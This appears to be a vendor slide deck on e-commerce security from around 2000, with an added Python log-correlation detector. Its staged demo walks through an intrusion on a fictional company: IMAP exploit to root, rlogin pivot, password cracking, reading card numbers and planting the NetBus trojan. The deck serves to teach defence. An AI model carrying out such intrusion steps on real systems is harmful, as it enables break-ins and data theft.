Protecting The Digital Economy
David Gerulski
Director of Marketing
Internet Security Systems
Agenda
• Introduction
• E-Commerce Security Drivers
• Developing a Security Policy
• Anatomy of an Attack
• Policy Enforcement
• Enterprise Risk Management
• Security Resources
• Conclusion
ISS Overview
• Headquartered in Atlanta, GA, USA
• Pioneered vulnerability assessment and intrusion detection technology
• Leader in Enterprise Security Management
• Publicly traded on NASDAQ: ISSX
• Industry-leading technology: 35+ product awards
• 1,000+ employee owners worldwide
• Over 300 certified security partners
• Over 7,500 customers worldwide
ISS Market Share
Source: International Data Corporation (IDC), August 1999
[Chart: ISS share of the Network Vulnerability Assessment market, the Network Intrusion Detection market, and the combined Network Intrusion Detection & Assessment market]
Business Is Changing
Source: Forrester Research, Inc.
Yesterday:
• Internal Focus: access is granted to employees only
• Centralized Assets: applications and data are centralized in fortified IT bunkers
• IT Control: the security manager decides who gets access
• Prevent Losses: the goal of security is to protect against confidentiality breaches
Today:
• External Focus: suppliers, customers, and prospects all need some form of access
• Distributed Assets: applications and data are distributed across servers, locations, and business units
• Business Control: business units want the authority to grant access
• Generate Revenue: the goal of security is to enable eCommerce
The Threat Grows
Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
[Chart: 1996 38%, 1997 47%, 1998 54%]
E-Commerce Issues
Principal Business Drivers
• Increase Revenue
• Increase Profitability
Principal Security Drivers
• Greater Susceptibility to Attack
• Greater Probability of Catastrophic Consequences
• Much Greater “Loss to Incident” Ratio
Our Strength Is Our Weakness
• In Touch With Anyone With a Modem
• Have an International Presence
• Partners Can Now Collaborate
• Leverage Web-based Supply Chain Technologies
• Employees Can Work From Home, at Night, Over the Weekends, and on Holiday
• Application Servers Can Support Entire Divisions
DDoS: Distributed Denial-of-Service
[Diagram: attack traffic from UNIX and NT hosts at Company A, Company B, University A, Company C and Company D converging on the target's router, UNIX firewall and web server]
Consequences
• Decreased Employee Productivity
• Loss of Intellectual Property & Assets
• Inefficient Use of Resources
• Exposure to Legal Liability
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
Summary
• E-Business is here to stay
• Networks are exposed and under attack
• There’s no more turning a “blind eye”
• It’s a business issue and it should be treated in a business-like manner
• Implement a security program, not a security technology
Developing a Security Policy: A Blueprint for Success
Security Policy
• Blueprint for a Good Security Program
• Standards Based - British Standard 7799
• Management Buy-In
• High Level to Technical
• Business Driven Not Vendor Driven
• Non-Static
Enforced Security Policy
• Minimize Exposure to Vulnerabilities
• Prepare for Attacks on Our Systems
• Manage Internal Staff Behavior
• Manage External Access and Activity
• Maintain Appropriate Security Configurations & Response Strategies
• Exploit Built-in Security Features
• Measure and Record Patterns and Trends for Future Security Planning
Registrant:
Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive
Really Big, CA 90120 US
Domain Name: BIGWIDGET.COM
Administrative Contact, Technical Contact:
Simms, Haywood (HS69) [email protected]
1111 Big Widget Drive, UMIL04-07
Really Big, CA 90210
678-443-6001
Zone Contact, Billing Contact:
Dodge, Rodger (RD32) [email protected]
1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210
678-443-6014
Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54
Domain servers in listed order:
EHECATL.BIGWIDGET.COM 208.21.0.7
NS1-AUTH.SPRINTLINK.NET 206.228.179.10
NS.COMMANDCORP.COM 130.205.70.10
~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
hacker:
hacker:~$
Connection closed by foreign host.
telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
root
bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting
208.21.2.11 fasttalk sales
208.21.2.12 geekspeak engineering
208.21.2.13 people human resources
208.21.2.14 thelinks marketing
208.21.2.15 thesource information systems
bigwidget:~# rlogin thevault
login:
thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith 6543-2223-1209-4002 12/99
Donna D. Smith 6543-4133-0632-4572 06/98
Jim Smith 6543-2344-1523-5522 01/01
Joseph L. Smith 6543-2356-1882-7532 04/02
Kay L. Smith 6543-2398-1972-4532 06/03
Mary Ann Smith 6543-8933-1332-4222 05/01
Robert F. Smith 6543-0133-5232-3332 05/99
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambob
username: mary password: mary
username: root password: ncc1701
thevault:~# ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit
thevault:~$ telnet thesource
Trying 208.21.2.160...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: administrator
password: *******
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe
Connected to the.source.bigwidget.com
NetBus 1.6, by cf
Screendump
David Smith <[email protected]>
My Raise <URGENT>
Dear Mr. Smith
I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.
Your Son,
Dave
David Smith
Anatomy of the Attack
BigWidget’s Network
[Diagram: router, UNIX firewall, e-mail server, web server, UNIX and NT servers, and clients and workstations on the network, annotated with the three attack steps: imap exploit, Crack, NetBus]
IT Infrastructure
[Diagram: router, firewall, e-mail server, web server, servers, clients and workstations, network]
What Is Vulnerable?
• Applications: e-commerce web server, e-mail server, firewall, router, SAP, PeopleSoft, web browsers
• Operating Systems: AIX, Solaris, HP-UX, Windows 95 & NT
• Network: firewall, router
Vulnerability Assessment Service
Corrective Action Report
Vulnerability: GetAdmin
Severity: High Risk
IP Address: 215.011.200.255
OS: Windows NT 4.0
Fix: From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.
Managed Intrusion Detection Service
[Diagram: response flow. External attack detected → e-mail alert / log → record session → session terminated → reconfigure firewall / router. Internal attack detected → session logged.]
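As an added example, not from the deck and not ISS or BellSouth code, the correlation that the Anatomy of the Attack and Managed Intrusion Detection slides describe, in Python: it walks constructed log lines in an assumed "time src dst port event" format, chains the recon, IMAP exploit, rlogin pivot and NetBus upload into one incident by tracking which hosts are already compromised, and maps each stage to the slide's responses (alert/log, record, terminate, reconfigure).

```python
import re
from collections import defaultdict

# Constructed sample log, assumed format "HH:MM src dst port EVENT [extra]".
# The events mirror the demo: banner grabs on 25 and 143, IMAP overflow,
# root telnet login, rlogin pivot to thevault, netbus.exe upload to thesource.
SAMPLE_LOG = """\
11:50 10.1.1.5 bigwidget 25 SMTP_BANNER
11:51 10.1.1.5 bigwidget 143 IMAP_BANNER
11:52 10.1.1.5 bigwidget 143 IMAP_LOGIN_OVERFLOW
11:53 10.1.1.5 bigwidget 23 TELNET_LOGIN user=root
11:55 bigwidget thevault 513 RLOGIN_LOGIN user=root
11:58 thevault thesource 21 FTP_STOR file=netbus.exe
12:01 10.1.1.9 bigwidget 80 HTTP_GET
"""
LINE = re.compile(r"(\S+) (\S+) (\S+) (\d+) (\S+)(?: (.*))?$")

# The responses from the managed-IDS flow on the slide.
ALERT, RECORD = "email alert/log", "record session"
TERMINATE, RECONFIGURE = "terminate session", "reconfigure firewall/router"
LATERAL_EVENTS = ("TELNET_LOGIN", "RLOGIN_LOGIN", "FTP_STOR")

def correlate(log_text):
    """One pass over the log; returns (alerts, compromised_hosts).
    A host is marked compromised after an overflow against it, or a root
    login from a source that already did reconnaissance. Any later login
    or upload *from* a compromised host is lateral movement and taints its
    target, which chains the three separate demo steps into one incident.
    """
    banners = defaultdict(set)          # src -> ports banner-grabbed
    compromised, alerts = set(), []     # alerts: (time, src, dst, stage, responses)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                    # not in the assumed format
        ts, src, dst, port, event, extra = m.groups()
        if event.endswith("_BANNER"):
            banners[src].add(int(port))
            if len(banners[src]) == 2:  # alert once per scanning source
                alerts.append((ts, src, dst, "recon: banner grabs on several ports", [ALERT]))
        elif event.endswith("_OVERFLOW"):
            compromised.add(dst)
            alerts.append((ts, src, dst, "exploit", [ALERT, TERMINATE, RECONFIGURE]))
        elif src in compromised and event in LATERAL_EVENTS:
            compromised.add(dst)
            alerts.append((ts, src, dst, "lateral movement: " + event, [ALERT, RECORD, TERMINATE]))
        elif event.endswith("_LOGIN") and "user=root" in (extra or "") and src in banners:
            compromised.add(dst)
            alerts.append((ts, src, dst, "root login after recon", [ALERT, RECORD]))
    return alerts, compromised
```

The unrelated HTTP request from 10.1.1.9 produces no alert, while the pivot from bigwidget to thevault to thesource is flagged even though each hop on its own looks like an ordinary internal login or file transfer.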
Why a managed solution?
Reasons for firewall breach (Computer Security Institute Study 1998): mismanagement 49%, bad technology 7%, both 44%.
Why Outsource?
• Network Security Is Complex
• Requires Specialized Skills and Dedicated Resources
• Difficulty in Hiring, Maintaining and Retaining IT Security Staff
• High Costs of Doing It on Your Own
Benefits of Using BellSouth’s Managed Security Services
• Enables organizations to establish and maintain security across the Internet, Intranet and Extranet
– Less expensive
• Leverage an existing security infrastructure
• Offers reliability and cost-effectiveness without having to maintain 24x7 dedicated security staff
• Scalable and modular services enable increased flexibility to upgrade services as needed
– More Secure
• Based on a robust and proven security architecture
• Utilizes best-of-breed technologies
• Supported by a dedicated staff of security engineers
• Proven operational procedures ensure proper response and escalation of security events
• Round-the-clock real-time monitoring for full-time protection
• All critical Internet-based security needs are addressed
– Frees up your resources to focus on other key company initiatives
BellSouth & ISS Value Proposition
• BellSouth
– Trusted Business Partner
– Operational Excellence
– Highest levels of Customer Satisfaction
• Internet Security Systems (ISS)
– Security Expertise
– Market leader in security
• Together
– Best in class IP access and network security solutions to support your E-Business strategy